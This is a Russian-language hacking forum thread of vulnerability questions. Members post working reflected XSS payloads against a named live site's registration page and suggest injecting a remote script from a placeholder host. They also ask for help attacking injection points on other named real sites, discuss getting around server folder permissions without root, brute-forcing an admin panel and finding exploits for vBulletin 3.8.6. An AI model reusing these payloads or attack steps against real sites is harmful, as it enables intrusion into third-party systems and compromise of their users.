Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. 3ran

    3ran Member

    Joined:
    27 Jul 2012
    Messages:
    39
    Likes Received:
    19
    Reputations:
    5
    Проще будет отредактировать максимальное количество вводимых символов в исходном коде.
    Да,и js не запустится через сократитель ссылок :D
     
  2. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Подключите удаленный скрипт <script src="http://youhost.com/script.js">
     
    BigBear and UXOR like this.
  3. Bragal

    Bragal New Member

    Joined:
    12 May 2011
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д :eek: Как админ так хитро ограничил доступ?
     
  4. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Ничего хитрого, просто правильно расставлены ограничения.
     
  5. Bragal

    Bragal New Member

    Joined:
    12 May 2011
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    И каким же образом? Реально обойти без получения рута?
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    на всякий случай можно без кавычек и без http. <script src=//lol.ru/1.js></script>
     
    _________________________
    ocheretko likes this.
  7. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? .
     
  8. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Привет всем,можно ли создать скрипт самоудаляющейся чтобы и теги его тоже удалялись?
     
  9. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    можно
     
  10. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:
    Code:
    <input type="hidden" id="refererNickname" name="refererNickname" value=""><script type="text/javascript">alert(/olololkin2/);</script><input type="text" value="1"/>
    Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox
    Code:
    (Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1
    
    User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
    
    Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    В первый раз такое. Адрес:
    Code:
    http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    я пока сам не понял в чем дело, однако prompt() срабатывает:
    Code:
    http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E
     
    _________________________
    ocheretko likes this.
  12. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    _________________________
    ocheretko likes this.
  13. 3ran

    3ran Member

    Joined:
    27 Jul 2012
    Messages:
    39
    Likes Received:
    19
    Reputations:
    5
    А ты думал достаточно просто найти админку?)
    Можешь теперь поставить её на брут,но шансов подобрать логин/пароль практически нет.
    Ищи уязвимости,пробей какая версия движка там стоит,поищи сплоиты и тд.
     
  14. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Подскажи пжл как такой скрипт составить.
     
  15. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    vBulletin 3.8.6 . Сплоиты не могу найти и юзать я их тоже не умею .
     
  16. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
  17. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
  18. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Br@!ns and winstrool like this.
  19. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    И все-таки алерт тоже работает, но вот почему он не вызывается, хотя по всему должен , как записано у ocheretko я х.з. реврайтов каких то не увидел...

    Code:
    http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cimg%20src=%271.jpg%27%20onerror=alert%28/1/%29%3E
     
  20. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку
    Code:
    http://navi-gaming.com/en/achievements?id[]=71
    Code:
    http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\